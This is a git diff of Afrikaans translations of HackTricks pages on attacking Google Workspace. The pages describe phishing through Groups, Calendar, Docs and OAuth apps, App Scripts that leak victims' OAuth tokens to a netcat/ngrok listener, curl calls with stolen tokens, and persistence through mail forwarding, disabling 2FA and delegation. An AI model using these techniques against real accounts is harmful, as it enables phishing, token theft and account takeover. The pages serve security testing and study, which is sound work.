Translated ['.github/pull_request_template.md', 'src/README.md', 'src/pe

This commit is contained in:
Translator
2025-01-01 23:58:25 +00:00
parent 396dbafaf2
commit 8fb73b8cf9
216 changed files with 2011 additions and 2031 deletions

View File

@@ -2,7 +2,7 @@
{{#include ../../banners/hacktricks-training.md}}
## Ingangspunte
## Toegangspunte
### Google Platforms en OAuth Apps Phishing
@@ -12,13 +12,13 @@ Kyk hoe jy verskillende Google platforms soos Drive, Chat, Groups... kan gebruik
gws-google-platforms-phishing/
{{#endref}}
### Wagwoord Spraying
### Wagwoord Spuit
Om wagwoorde te toets met al die e-posse wat jy gevind het (of wat jy gegenereer het gebaseer op 'n e-pos naam patroon wat jy dalk ontdek het) kan jy 'n hulpmiddel soos [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (alhoewel dit onondersteun lyk) gebruik wat AWS lambdas sal gebruik om IP-adresse te verander.
## Post-Exploitation
As jy sekere akrediteer of die sessie van die gebruiker gecompromitteer het, kan jy verskeie aksies uitvoer om toegang te verkry tot potensieel sensitiewe inligting van die gebruiker en om te probeer om voorregte te verhoog:
As jy sekere akrediteer of die sessie van die gebruiker gecompromitteer het, kan jy verskeie aksies uitvoer om toegang te verkry tot potensieel sensitiewe inligting van die gebruiker en om te probeer om bevoegdhede te verhoog:
{{#ref}}
gws-post-exploitation.md
@@ -34,7 +34,7 @@ Lees meer oor die verskillende tegnieke om tussen GWS en GCP te pivot in:
## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID)
- **GCPW (Google Credential Provider for Windows)**: Dit is die enkele aanmeld wat Google Workspaces bied sodat gebruikers op hul Windows PC's kan aanmeld met **hulle Workspace akrediteer**. Boonop sal dit **tokens stoor om toegang tot Google Workspace** in sekere plekke op die PC te verkry.
- **GCPW (Google Credential Provider for Windows)**: Dit is die enkele aanmeld wat Google Workspaces bied sodat gebruikers in hul Windows PC's kan aanmeld met **hul Workspace akrediteer**. Boonop sal dit **tokens stoor om toegang tot Google Workspace** op sekere plekke in die PC te verkry.
- **GCDS (Google Cloud Directory Sync)**: Dit is 'n hulpmiddel wat gebruik kan word om **jou aktiewe gids gebruikers en groepe na jou Workspace te sinkroniseer**. Die hulpmiddel vereis die **akrediteer van 'n Workspace supergebruiker en bevoorregte AD gebruiker**. Dit mag dus moontlik wees om dit binne 'n domein bediener te vind wat gebruikers van tyd tot tyd sal sinkroniseer.
- **Admin Directory Sync**: Dit laat jou toe om gebruikers van AD en EntraID in 'n serverless proses te sinkroniseer vanaf [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).

View File

@@ -10,7 +10,7 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodo
## Google Groups Phishing
Blijkbaar kan lede in die werkruimte [**groepe skep**](https://groups.google.com/all-groups) **en mense na hulle uitnooi**. Jy kan dan die e-pos wat aan die gebruiker gestuur sal word **wysig deur 'n paar skakels by te voeg.** Die **e-pos sal van 'n google adres kom**, so dit sal **legitiem** lyk en mense mag op die skakel klik.
Blijkbaar kan lede in workspace [**groepe skep**](https://groups.google.com/all-groups) **en mense na hulle uitnooi**. Jy kan dan die e-pos wat aan die gebruiker gestuur sal word **wysig deur 'n paar skakels by te voeg.** Die **e-pos sal van 'n google adres kom**, so dit sal **legitiem** lyk en mense mag op die skakel klik.
Dit is ook moontlik om die **FROM** adres as die **Google groep e-pos** in te stel om **meer e-posse aan die gebruikers binne die groep** te stuur, soos in die volgende beeld waar die groep **`google--support@googlegroups.com`** geskep is en 'n **e-pos aan al die lede** van die groep gestuur is (wat sonder enige toestemming bygevoeg is)
@@ -29,7 +29,7 @@ Jy kan kyk hoe dit in die verlede gewerk het in: [https://www.youtube.com/watch?
## Google Doc Phishing
In die verlede was dit moontlik om 'n **blijkbaar legitieme dokument** te skep en in 'n kommentaar **'n e-pos te noem (soos @user@gmail.com)**. Google **het 'n e-pos na daardie e-pos adres gestuur** om te kennis te gee dat hulle in die dokument genoem is.\
In die verlede was dit moontlik om 'n **blijkbaar legitieme dokument** te skep en in 'n kommentaar **'n e-pos te noem (soos @user@gmail.com)**. Google **het 'n e-pos na daardie e-pos adres gestuur** om te laat weet dat hulle in die dokument genoem is.\
Tans werk dit nie, maar as jy **die slagoffer se e-pos toegang tot die dokument gee**, sal Google 'n e-pos stuur wat dit aandui. Dit is die boodskap wat verskyn wanneer jy iemand noem:
<figure><img src="../../../images/image (7).png" alt=""><figcaption></figcaption></figure>
@@ -39,9 +39,9 @@ Tans werk dit nie, maar as jy **die slagoffer se e-pos toegang tot die dokument
## Google Calendar Phishing
Jy kan **'n kalender gebeurtenis skep** en soveel e-pos adresse van die maatskappy wat jy aanval as wat jy het, byvoeg. Skeduleer hierdie kalender gebeurtenis in **5 of 15 min** vanaf die huidige tyd. Maak die gebeurtenis legitiem en **sit 'n kommentaar en 'n titel wat aandui dat hulle iets moet lees** (met die **phishing skakel**).
Jy kan **'n kalender gebeurtenis skep** en soveel e-pos adresse van die maatskappy wat jy aanval as wat jy het, byvoeg. Skeduleer hierdie kalender gebeurtenis in **5 of 15 min** vanaf die huidige tyd. Laat die gebeurtenis legitiem lyk en **sit 'n kommentaar en 'n titel wat aandui dat hulle iets moet lees** (met die **phishing skakel**).
Dit is die waarskuwing wat in die blaaiert sal verskyn met 'n vergadering titel "Mense Ontslae", so jy kan 'n meer phishing-agtige titel stel (en selfs die naam wat met jou e-pos geassosieer word, verander).
Dit is die waarskuwing wat in die blaaier sal verskyn met 'n vergadering titel "Firing People", so jy kan 'n meer phishing-agtige titel stel (en selfs die naam wat met jou e-pos geassosieer is, verander).
<figure><img src="../../../images/image (8).png" alt=""><figcaption></figcaption></figure>
@@ -49,7 +49,7 @@ Om dit minder verdag te laat lyk:
- Stel dit op sodat **ontvangers nie die ander mense wat uitgenooi is kan sien nie**
- Moet **nie e-posse stuur wat oor die gebeurtenis kennis gee nie**. Dan sal die mense net hul waarskuwing oor 'n vergadering in 5min sien en dat hulle daardie skakel moet lees.
- Blijkbaar kan jy met die API stel dat **waar** dat **mense** die gebeurtenis **aanvaar** het en selfs **kommentaar namens hulle skep**.
- Blijkbaar kan jy met die API stel dat **mense** die gebeurtenis **aanvaar** het en selfs **kommentaar namens hulle skep**.
## App Scripts Redirect Phishing
@@ -62,7 +62,7 @@ return HtmlService.createHtmlOutput(
).setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL)
}
```
For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec) you will see:
Byvoorbeeld, deur toegang te verkry tot [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec) sal jy sien:
<figure><img src="../../../images/image (4) (1).png" alt=""><figcaption></figcaption></figure>
@@ -71,7 +71,7 @@ For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33
## App Scripts OAuth Phishing
Dit is moontlik om App Scripts aan dokumente te koppel om te probeer toegang te verkry oor 'n slagoffer se OAuth-token, vir meer inligting kyk:
Dit is moontlik om App Scripts te skep wat aan dokumente gekoppel is om te probeer toegang te verkry tot 'n slagoffer se OAuth-token. Vir meer inligting, kyk:
{{#ref}}
gws-app-scripts.md
@@ -79,63 +79,63 @@ gws-app-scripts.md
## OAuth Apps Phishing
Enige van die vorige tegnieke kan gebruik word om die gebruiker toegang te laat verkry tot 'n **Google OAuth-toepassing** wat die gebruiker **toestemming** sal **vraag**. As die gebruiker die **bron** **vertrou**, kan hy die **toepassing** **vertrou** (selfs as dit vir hoë bevoorregte toestemmings vra).
Enige van die vorige tegnieke kan gebruik word om die gebruiker toegang te laat verkry tot 'n **Google OAuth-toepassing** wat die gebruiker om **toegang** sal vra. As die gebruiker die **bron** **vertrou**, kan hy die **toepassing** **vertrou** (selfs al vra dit vir hoë bevoorregte toestemmings).
> [!NOTE]
> Let daarop dat Google 'n lelike prompt aanbied wat waarsku dat die toepassing onbetroubaar is in verskeie gevalle en Workspace-administrateurs kan selfs voorkom dat mense OAuth-toepassings aanvaar.
> Let daarop dat Google 'n lelike prompt aanbied wat waarsku dat die toepassing in verskeie gevalle nie vertrou word nie, en Workspace-administrateurs kan selfs voorkom dat mense OAuth-toepassings aanvaar.
**Google** laat toe om toepassings te skep wat kan **interaksie hê namens gebruikers** met verskeie **Google-dienste**: Gmail, Drive, GCP...
Wanneer 'n toepassing geskep word om **namens ander gebruikers** op te tree, moet die ontwikkelaar 'n **OAuth-toepassing binne GCP** skep en die skope (toestemmings) aan dui wat die toepassing nodig het om toegang tot die gebruikersdata te verkry.\
Wanneer 'n **gebruiker** daardie **toepassing** wil **gebruik**, sal hulle **gevra** word om te **aanvaar** dat die toepassing toegang tot hul data sal hê soos gespesifiseer in die skope.
Wanneer 'n **gebruiker** daardie **toepassing** wil **gebruik**, sal hulle gevra word om te **aanvaar** dat die toepassing toegang tot hul data het soos gespesifiseer in die skope.
Dit is 'n baie aantreklike manier om **phish** nie-tegniese gebruikers om **toepassings te gebruik wat sensitiewe inligting toegang gee** omdat hulle dalk nie die gevolge verstaan nie. Dit is egter in organisasies se rekeninge, daar is maniere om te voorkom dat dit gebeur.
Dit is 'n baie aantreklike manier om **phish** nie-tegniese gebruikers om **toepassings te gebruik wat sensitiewe inligting toegang gee** omdat hulle dalk nie die gevolge verstaan nie. In organisasies se rekeninge is daar egter maniere om te voorkom dat dit gebeur.
### Onverifieerde App-prompt
Soos genoem, sal Google altyd 'n **prompt aan die gebruiker aanbied om die** toestemmings wat hulle aan die toepassing gee, te **aanvaar**. As die toepassing egter as **gevaarlik** beskou word, sal Google **eerste** 'n **prompt** wys wat aandui dat dit **gevaarlik** is en **dit moeiliker maak** vir die gebruiker om die toestemmings aan die toepassing te gee.
Soos genoem, sal Google altyd 'n **prompt aan die gebruiker aanbied om die** toestemmings wat hulle aan die toepassing gee, te aanvaar. As die toepassing egter as **gevaarlik** beskou word, sal Google **eerste** 'n **prompt** toon wat aandui dat dit **gevaarlik** is en **dit moeiliker maak** vir die gebruiker om die toestemmings aan die toepassing te gee.
Hierdie prompt verskyn in toepassings wat:
- Enige skope gebruik wat toegang tot private data kan verkry (Gmail, Drive, GCP, BigQuery...)
- Enige skoop gebruik wat toegang tot privaat data kan verkry (Gmail, Drive, GCP, BigQuery...)
- Toepassings met minder as 100 gebruikers (toepassings > 100 'n hersieningsproses is ook nodig om die onverifieerde prompt te stop)
### Interessante Skope
[**Hier**](https://developers.google.com/identity/protocols/oauth2/scopes) kan jy 'n lys van al die Google OAuth-skope vind.
- **cloud-platform**: Beskou en bestuur jou data oor **Google Cloud Platform** dienste. Jy kan die gebruiker in GCP naboots.
- **cloud-platform**: Beskou en bestuur jou data oor **Google Cloud Platform**-dienste. Jy kan die gebruiker in GCP naboots.
- **admin.directory.user.readonly**: Sien en laai jou organisasie se GSuite-gids af. Kry name, telefone, kalender-URL's van al die gebruikers.
### Skep 'n OAuth App
**Begin om 'n OAuth Client ID te skep**
1. Gaan na [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) en klik op konfigureer die toestemming skerm.
2. Dan sal jy gevra word of die **gebruiker tipe** **intern** (slegs vir mense in jou org) of **extern** is. Kies die een wat by jou behoeftes pas
- Intern mag interessant wees as jy reeds 'n gebruiker van die organisasie gecompromitteer het en jy hierdie App skep om 'n ander een te phish.
3. Gee 'n **naam** aan die app, 'n **ondersteunings e-pos** (let daarop dat jy 'n googlegroup e-pos kan stel om jouself 'n bietjie meer te anonimiseer), 'n **logo**, **geautoriseerde domeine** en 'n ander **e-pos** vir **opdaterings**.
4. **Kies** die **OAuth skope**.
- Hierdie bladsy is verdeel in nie-sensitiewe toestemmings, sensitiewe toestemmings en beperkte toestemmings. Elke keer as jy 'n nuwe toestemming byvoeg, word dit in sy kategorie bygevoeg. Afhangende van die aangevraagde toestemmings sal verskillende prompts aan die gebruiker verskyn wat aandui hoe sensitief hierdie toestemmings is.
1. Gaan na [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) en klik op konfigureer die toestemmingskerm.
2. Jy sal gevra word of die **gebruikertipe** **intern** (slegs vir mense in jou org) of **extern** is. Kies die een wat by jou behoeftes pas.
- Intern kan interessant wees as jy reeds 'n gebruiker van die organisasie gecompromitteer het en jy hierdie App skep om 'n ander een te phish.
3. Gee 'n **naam** aan die toepassing, 'n **ondersteunings-e-pos** (let daarop dat jy 'n googlegroup-e-pos kan stel om jouself 'n bietjie meer te anonimiseer), 'n **logo**, **geautoriseerde domeine** en 'n ander **e-pos** vir **opdaterings**.
4. **Kies** die **OAuth-skope**.
- Hierdie bladsy is verdeel in nie-sensitiewe toestemmings, sensitiewe toestemmings en beperkte toestemmings. Elke keer as jy 'n nuwe toestemming byvoeg, word dit in sy kategorie bygevoeg. Afhangende van die aangevraagde toestemmings, sal verskillende prompts aan die gebruiker verskyn wat aandui hoe sensitief hierdie toestemmings is.
- Beide **`admin.directory.user.readonly`** en **`cloud-platform`** is sensitiewe toestemmings.
5. **Voeg die toetsgebruikers by.** Solank die status van die app toets is, sal slegs hierdie gebruikers toegang tot die app hê, so maak seker om **die e-pos wat jy gaan phish** by te voeg.
5. **Voeg die toetsgebruikers by.** Solank as wat die status van die toepassing toets is, sal slegs hierdie gebruikers toegang tot die toepassing hê, so maak seker om **die e-pos wat jy gaan phish** by te voeg.
Nou kom ons **kry kredensiale vir 'n webtoepassing** met behulp van die **voorheen geskepte OAuth Client ID**:
Nou kom ons **verkry kredensiale vir 'n webtoepassing** met behulp van die **voorheen geskepte OAuth Client ID**:
1. Gaan terug na [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient), 'n ander opsie sal hierdie keer verskyn.
2. Kies om **kredensiale vir 'n webtoepassing te skep**
3. Stel nodige **Javascript oorspronge** en **herlei URI's**
- Jy kan in albei iets soos **`http://localhost:8000/callback`** vir toetsing stel
4. Kry jou toepassing se **kredensiale**
2. Kies om **kredensiale vir 'n webtoepassing te skep**.
3. Stel nodige **Javascript oorspronge** en **herlei URI's** in.
- Jy kan in albei iets soos **`http://localhost:8000/callback`** vir toetsing stel.
4. Kry jou toepassing se **kredensiale**.
Laastens, laat ons **'n webtoepassing laat loop wat die OAuth-toepassing se kredensiale sal gebruik**. Jy kan 'n voorbeeld vind in [https://github.com/carlospolop/gcp_oauth_phishing_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
Laastens, laat ons **'n webtoepassing uitvoer wat die OAuth-toepassing se kredensiale sal gebruik**. Jy kan 'n voorbeeld vind in [https://github.com/carlospolop/gcp_oauth_phishing_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
```bash
git clone ttps://github.com/carlospolop/gcp_oauth_phishing_example
cd gcp_oauth_phishing_example
pip install flask requests google-auth-oauthlib
python3 app.py --client-id "<client_id>" --client-secret "<client_secret>"
```
Gaan na **`http://localhost:8000`** en klik op die Login with Google-knoppie, jy sal **gevra** word met 'n boodskap soos hierdie:
Gaan na **`http://localhost:8000`** en klik op die Login with Google knoppie, jy sal **gevra** word met 'n boodskap soos hierdie:
<figure><img src="../../../images/image (333).png" alt=""><figcaption></figcaption></figure>

View File

@@ -4,7 +4,7 @@
## App Scripts
App Scripts is **kode wat geaktiveer sal word wanneer 'n gebruiker met redigeerder toestemming die dokument toegang wat die App Script mee verbind is** en na **aanvaarding van die OAuth prompt**.\
App Scripts is **kode wat geaktiveer sal word wanneer 'n gebruiker met redigeer toestemming toegang tot die dokument wat met die App Script gekoppel is** en na **aanvaarding van die OAuth prompt**.\
Hulle kan ook ingestel word om **elke sekere tyd uitgevoer te word** deur die eienaar van die App Script (Persistensie).
### Skep App Script
@@ -69,18 +69,18 @@ Sien die [Command Line Interface using `clasp` guide](https://developers.google.
### Skep Google Sheet met App Script
Begin deur 'n App Script te skep, my aanbeveling vir hierdie scenario is om 'n Google Sheet te skep en na **`Extensions > App Scripts`** te gaan, dit sal 'n **nuwe App Script vir jou oopmaak wat aan die bladsy gekoppel is**.
Begin deur 'n App Script te skep, my aanbeveling vir hierdie scenario is om 'n Google Sheet te skep en na **`Extensions > App Scripts`** te gaan, dit sal 'n **nuwe App Script vir jou oopmaak wat aan die blad gekoppel is**.
### Leak token
### Lek token
Om toegang te gee tot die OAuth token moet jy op **`Services +` klik en skoppe soos**:
Om toegang tot die OAuth token te gee, moet jy op **`Services +` klik en skoppe soos**:
- **AdminDirectory**: Toegang tot gebruikers en groepe van die gids (as die gebruiker genoeg toestemming het)
- **Gmail**: Om toegang tot gmail data te verkry
- **Drive**: Om toegang tot drive data te verkry
- **Google Sheets API**: Sodat dit met die trigger werk
Om self die **nodige skoppe** te verander kan jy na projekinstellings gaan en aktiveer: **`Show "appsscript.json" manifest file in editor`.**
Om self die **nodige skoppe** te verander, kan jy na projekinstellings gaan en aktiveer: **`Show "appsscript.json" manifest file in editor`.**
```javascript
function getToken() {
var userEmail = Session.getActiveUser().getEmail()
@@ -138,54 +138,54 @@ Om die versoek te vang kan jy net uitvoer:
ngrok tcp 4444
nc -lv 4444 #macOS
```
Permissions requested to execute the App Script:
Permissions aangevra om die App Script uit te voer:
<figure><img src="../../../images/image (334).png" alt=""><figcaption></figcaption></figure>
> [!WARNING]
> Aangesien 'n eksterne versoek gemaak word, sal die OAuth-prompt ook **vra om toestemming om eksterne eindpunte te bereik**.
### Create Trigger
### Skep Trigger
Sodra die App gelees is, klik op **⏰ Triggers** om 'n trigger te skep. As **funksie** om te loop, kies **`getToken`**, loop by implementering **`Head`**, in gebeurtenisbron kies **`From spreadsheet`** en gebeurtenistipe kies **`On open`** of **`On edit`** (volgens jou behoeftes) en stoor.
Let daarop dat jy die **lopies van die App Scripts in die Executions-tab kan nagaan** as jy iets wil debugeer.
Let daarop dat jy die **uitvoerings van die App Scripts in die Uitvoerings-oortjie** kan nagaan as jy iets wil debugeer.
### Sharing
### Deel
Om die **App Script** te **trigger**, moet die slagoffer met **Editor Access** verbind.
Om die **App Script** te **trigger**, moet die slagoffer met **Editor Toegang** verbind.
> [!TIP]
> Die **token** wat gebruik word om die **App Script** uit te voer, sal die een van die **skepper van die trigger** wees, selfs al word die lêer as Editor deur ander gebruikers geopen.
> Die **token** wat gebruik word om die **App Script** uit te voer, sal die een wees van die **skepper van die trigger**, selfs al word die lêer as Editor deur ander gebruikers geopen.
### Abusing Shared With Me documents
### Misbruik van Gedeel Met My dokumente
> [!CAUTION]
> As iemand **'n dokument met App Scripts en 'n trigger wat die Head** van die App Script gebruik, met jou gedeel het (nie 'n vaste implementering nie), kan jy die App Script-kode wysig (byvoorbeeld die steel token funksies byvoeg), dit toegang en die **App Script sal uitgevoer word met die toestemmings van die gebruiker wat die dokument met jou gedeel het**! (let daarop dat die eienaar se OAuth-token as toegangskope diegene sal hê wat gegee is toe die trigger geskep is).
> As iemand **'n dokument met App Scripts en 'n trigger wat die Head** van die App Script gebruik, met jou gedeel het (nie 'n vaste implementering nie), kan jy die App Script-kode wysig (byvoorbeeld die steel token funksies byvoeg), dit toegang, en die **App Script sal uitgevoer word met die toestemmings van die gebruiker wat die dokument met jou gedeel het**! (let daarop dat die eienaar se OAuth-token toegangskopes sal hê soos gegee toe die trigger geskep is).
>
> 'n **kennisgewing sal aan die skepper van die skrip gestuur word wat aandui dat iemand die skrip gewysig het** (Wat van die gebruik van gmail-toestemmings om 'n filter te genereer om die waarskuwing te voorkom?)
> 'n **kennisgewing sal aan die skepper van die script gestuur word wat aandui dat iemand die script gewysig het** (Wat van die gebruik van gmail-toestemmings om 'n filter te genereer om die waarskuwing te voorkom?)
> [!TIP]
> As 'n **aanvaller die skope van die App Script wysig**, sal die opdaterings **nie toegepas** word op die dokument totdat 'n **nuwe trigger** met die veranderinge geskep word nie. Daarom sal 'n aanvaller nie in staat wees om die eienaar se skepper token met meer skope as die een wat hy in die trigger wat hy geskep het, gestel het, te steel nie.
> As 'n **aanvaller die skope van die App Script wysig**, sal die opdaterings **nie toegepas** word op die dokument totdat 'n **nuwe trigger** met die veranderinge geskep word. Daarom sal 'n aanvaller nie in staat wees om die eienaar se skepper token met meer skope as die een wat hy in die trigger wat hy geskep het, gestel het, te steel nie.
### Copying instead of sharing
### Kopieer in plaas van deel
Wanneer jy 'n skakel skep om 'n dokument te deel, word 'n skakel soortgelyk aan hierdie een geskep: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
As jy die einde **"/edit"** vir **"/copy"** **verander**, sal Google jou vra of jy 'n **kopie van die dokument wil genereer:**
As jy die einde **"/edit"** vir **"/copy"** **verander**, sal google jou vra of jy 'n **kopie van die dokument wil genereer:**
<figure><img src="../../../images/image (335).png" alt=""><figcaption></figcaption></figure>
As die gebruiker dit kopieer en toegang, sal beide die **inhoud van die dokument en die App Scripts gekopieer word**, maar die **triggers nie**, daarom **sal niks uitgevoer word** nie.
### Sharing as Web Application
### Deel as Webtoepassing
Let daarop dat dit ook moontlik is om **'n App Script as 'n Webtoepassing te deel** (in die Editor van die App Script, implementeer as 'n Webtoepassing), maar 'n waarskuwing soos hierdie sal verskyn:
Let daarop dat dit ook moontlik is om 'n **App Script as 'n Webtoepassing** te deel (in die Editor van die App Script, implementeer as 'n Webtoepassing), maar 'n waarskuwing soos hierdie sal verskyn:
<figure><img src="../../../images/image (337).png" alt=""><figcaption></figcaption></figure>
Gevolg deur die **tipiese OAuth-prompt wat** om die nodige toestemmings vra.
### Testing
### Toets
Jy kan 'n versamelde token toets om e-posse te lys met:
```bash
@@ -200,7 +200,7 @@ curl -H "Authorization: Bearer $OAUTH_TOKEN" \
```
## App Script as Persistence
Een opsie vir volharding sou wees om **'n dokument te skep en 'n trigger vir die getToken** funksie by te voeg en die dokument met die aanvaller te deel sodat elke keer wanneer die aanvaller die lêer oopmaak, hy **die token van die slagoffer uitbring.**
Een opsie vir volharding sou wees om 'n **dokument te skep en 'n trigger vir die getToken** funksie by te voeg en die dokument met die aanvaller te deel sodat elke keer wanneer die aanvaller die lêer oopmaak, hy **die token van die slagoffer uitbring.**
Dit is ook moontlik om 'n App Script te skep en dit elke X tyd (soos elke minuut, uur, dag...) te laat trigger. 'n Aanvaller wat **gekompromitteerde geloofsbriewe of 'n sessie van 'n slagoffer het, kan 'n App Script tyd-trigger instel en elke dag 'n baie bevoorregte OAuth-token lek**:
@@ -209,19 +209,19 @@ Skep eenvoudig 'n App Script, gaan na Triggers, klik op Voeg Trigger by, en kies
<figure><img src="../../../images/image (336).png" alt=""><figcaption></figcaption></figure>
> [!CAUTION]
> Dit sal 'n sekuriteitswaarskuwing e-pos en 'n push boodskap na jou mobiele toestel stuur wat oor dit waarsku.
> Dit sal 'n sekuriteitswaarskuwing e-pos en 'n push boodskap na jou mobiele toestel stuur wat jou hiervan in kennis stel.
### Shared Document Unverified Prompt Bypass
Boonop, as iemand **met jou 'n dokument met **redigeertoegang** gedeel het, kan jy **App Scripts binne die dokument genereer** en die **EIGENAAR (skepper) van die dokument sal die eienaar van die App Script wees**.
Boonop, as iemand **met jou 'n dokument met **redigeerder toegang** gedeel het, kan jy **App Scripts binne die dokument genereer** en die **EIGENAAR (skepper) van die dokument sal die eienaar van die App Script wees**.
> [!WARNING]
> Dit beteken dat die **skepper van die dokument as die skepper van enige App Script** wat iemand met redigeertoegang binne dit skep, sal verskyn.
> Dit beteken dat die **skepper van die dokument as die skepper van enige App Script** wat iemand met redigeerder toegang binne dit skep, sal verskyn.
>
> Dit beteken ook dat die **App Script vertrou sal word deur die Workspace omgewing** van die skepper van die dokument.
> [!CAUTION]
> Dit beteken ook dat as 'n **App Script reeds bestaan** en mense **toegang gegee het**, kan enigeen met **Redigeerder** toestemming op die dokument dit **wysig en daardie toegang misbruik.**\
> Om dit te misbruik, moet jy ook hê dat mense die App Script trigger. En 'n slim truuk is om die **script as 'n webtoepassing te publiseer**. Wanneer die **mense** wat reeds **toegang** tot die App Script gegee het, die webblad toegang, sal hulle die **App Script trigger** (dit werk ook met `<img>` etikette).
> Om dit te misbruik, moet jy ook hê dat mense die App Script trigger. En 'n slim truuk is om die **script as 'n webtoepassing te publiseer**. Wanneer die **mense** wat reeds **toegang** tot die App Script gegee het, die webblad toegang, sal hulle die **App Script trigger** (dit werk ook met `<img>` tags).
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -30,14 +30,14 @@ Kontroleer jou huidige filter (om dit te verwyder) in [https://mail.google.com/m
<figure><img src="../../images/image (331).png" alt=""><figcaption></figcaption></figure>
- Skep **doorstuuradres om sensitiewe inligting** (of alles) te deurstuur - Jy het handmatige toegang nodig.
- Skep 'n deurstuuradres in [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop)
- Skep **oorplasing adres om sensitiewe inligting** (of alles) te oorplaas - Jy het handmatige toegang nodig.
- Skep 'n oorplasing adres in [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop)
- Die ontvangende adres sal dit moet bevestig
- Stel dan in om al die e-posse deur te stuur terwyl jy 'n kopie hou (onthou om op veranderinge te stoor te klik):
- Stel dan in om al die e-posse oor te plaas terwyl 'n kopie behou word (onthou om op veranderinge te stoor te klik):
<figure><img src="../../images/image (332).png" alt=""><figcaption></figcaption></figure>
Dit is ook moontlik om filters te skep en slegs spesifieke e-posse na die ander e-posadres deur te stuur.
Dit is ook moontlik om filters te skep en slegs spesifieke e-posse na die ander e-posadres oor te plaas.
## App wagwoorde
@@ -51,7 +51,7 @@ As jy daarin geslaag het om 'n **google gebruikersessie te kompromitteer** en di
## Verander 2-FA en soortgelyk
Dit is ook moontlik om **2-FA af te skakel of 'n nuwe toestel** (of telefoonnommer) op hierdie bladsy [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\
**Dit is ook moontlik om wagkeys te genereer (voeg jou eie toestel by), die wagwoord te verander, mobiele nommers vir verifikasietelefone en herstel, die herstel e-pos te verander en die veiligheidsvrae te verander).**
**Dit is ook moontlik om wagsleutels te genereer (voeg jou eie toestel by), die wagwoord te verander, mobiele nommers vir verifikasietelefones en herstel, die herstel e-pos te verander en die veiligheidsvrae te verander).**
> [!CAUTION]
> Om **veiligheids push kennisgewings** te voorkom om die telefoon van die gebruiker te bereik, kan jy **sy slimfoon afteken** (alhoewel dit vreemd sou wees) omdat jy hom nie weer van hier af kan aanmeld nie.
@@ -62,7 +62,7 @@ Dit is ook moontlik om **2-FA af te skakel of 'n nuwe toestel** (of telefoonnomm
## Persistensie via OAuth Apps
As jy die **rekening van 'n gebruiker gecompromitteer het**, kan jy net **aanvaar** om al die moontlike toestemmings aan 'n **OAuth App** te verleen. Die enigste probleem is dat Workspace geconfigureer kan word om **onbeoordeelde eksterne en/of interne OAuth apps te verbied.**\
As jy die **rekening van 'n gebruiker gecompromitteer het**, kan jy net **aanvaar** om al die moontlike toestemmings aan 'n **OAuth App** toe te staan. Die enigste probleem is dat Workspace geconfigureer kan word om **onbeoordeelde eksterne en/of interne OAuth apps te verbied.**\
Dit is redelik algemeen dat Workspace Organisasies nie standaard eksterne OAuth apps vertrou nie, maar interne wel, so as jy **genoeg toestemmings het om 'n nuwe OAuth toepassing** binne die organisasie te genereer en eksterne apps is verbied, genereer dit en **gebruik daardie nuwe interne OAuth app om persistensie te handhaaf**.
Kyk na die volgende bladsy vir meer inligting oor OAuth Apps:
@@ -73,7 +73,7 @@ gws-google-platforms-phishing/
## Persistensie via delegasie
Jy kan net die **rekening aan 'n ander rekening** wat deur die aanvaller beheer word, **delegeer** (as jy toegelaat word om dit te doen). In Workspace **Organisasies** moet hierdie opsie **geaktiveer** wees. Dit kan vir almal gedeaktiveer word, geaktiveer vir sommige gebruikers/groepe of vir almal (gewoonlik is dit slegs geaktiveer vir sommige gebruikers/groepe of heeltemal gedeaktiveer).
Jy kan net die **rekening aan 'n ander rekening** wat deur die aanvaller beheer word, **delegeer** (as jy toegelaat word om dit te doen). In Workspace **Organisasies** moet hierdie opsie **geaktiveer** wees. Dit kan vir almal gedeaktiveer word, van sommige gebruikers/groepe geaktiveer of vir almal (gewoonlik is dit slegs geaktiveer vir sommige gebruikers/groepe of heeltemal gedeaktiveer).
<details>
@@ -84,9 +84,9 @@ Jy kan net die **rekening aan 'n ander rekening** wat deur die aanvaller beheer
As 'n administrateur vir jou organisasie (byvoorbeeld, jou werk of skool), beheer jy of gebruikers toegang tot hul Gmail-rekening kan delegeer. Jy kan almal die opsie gee om hul rekening te delegeer. Of, net mense in sekere departemente toelaat om delegasie op te stel. Byvoorbeeld, jy kan:
- Voeg 'n administratiewe assistent as 'n gedelegeerde op jou Gmail-rekening sodat hulle e-pos namens jou kan lees en stuur.
- Voeg 'n groep, soos jou verkoopsafdeling, in Groepe as 'n gedelegeerde om almal toegang tot een Gmail-rekening te gee.
- Voeg 'n groep, soos jou verkoopsafdeling, in Groepe as 'n gedelegeerde toe om almal toegang tot een Gmail-rekening te gee.
Gebruikers kan slegs toegang aan 'n ander gebruiker in dieselfde organisasie delegeer, ongeag hul domein of hul organisatoriese eenheid.
Gebruikers kan slegs toegang tot 'n ander gebruiker in dieselfde organisasie delegeer, ongeag hul domein of hul organisatoriese eenheid.
